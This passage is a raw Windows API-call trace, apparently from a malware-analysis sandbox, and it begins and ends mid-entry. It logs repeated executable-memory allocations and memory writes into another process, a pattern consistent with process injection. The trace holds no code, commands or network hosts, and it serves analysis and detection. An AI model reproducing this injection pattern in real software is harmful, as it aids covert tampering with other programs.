NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.278] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.278] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.279] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20018, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.279] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.279] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a310, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.279] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x22, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.279] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949a52*, NumberOfBytesToWrite=0xa, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949a52*, NumberOfBytesWritten=0x28df88*=0xa) returned 0x0 [0140.279] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.279] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.279] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.280] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.280] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.280] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.280] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.280] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.280] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.280] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.280] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001a, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.280] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.280] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a318, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.281] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x23, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.281] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949a5e*, NumberOfBytesToWrite=0xb, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949a5e*, NumberOfBytesWritten=0x28df88*=0xb) returned 0x0 [0140.281] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.281] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.281] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.281] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.281] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.281] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.282] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.282] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.282] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.282] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.282] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001b, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.282] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.282] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a320, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.282] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.282] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949924*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949924*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0140.283] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.283] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.283] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.283] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.283] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.283] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.283] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.283] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.284] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.284] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.284] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.284] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.284] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a328, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.284] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x20, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.284] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949934*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949934*, NumberOfBytesWritten=0x28df88*=0x8) returned 0x0 [0140.284] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.284] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.285] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.285] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.285] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.285] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.285] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.285] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.285] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.285] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.286] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20018, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.286] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.286] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a330, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.286] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.286] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x94993e*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x94993e*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0140.286] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.286] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.286] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.286] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.287] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.287] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.287] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.287] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.287] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.287] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.287] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.287] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.287] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a338, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.287] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.288] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949a6c*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949a6c*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0140.288] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.288] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.288] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.288] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.288] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.288] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.288] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.303] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.303] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.304] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.304] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.304] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.304] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a340, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.304] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x21, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.304] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949a80*, NumberOfBytesToWrite=0x9, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949a80*, NumberOfBytesWritten=0x28df88*=0x9) returned 0x0 [0140.304] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.304] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.305] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.305] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.305] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.305] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.305] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.305] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.305] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.305] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.305] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20019, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.305] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.306] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a348, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.306] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.306] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949a8c*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949a8c*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0140.306] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.306] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.306] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.306] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.306] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.307] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.307] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.307] NtReadVirtualMemory (in: ProcessHandle=0x138, 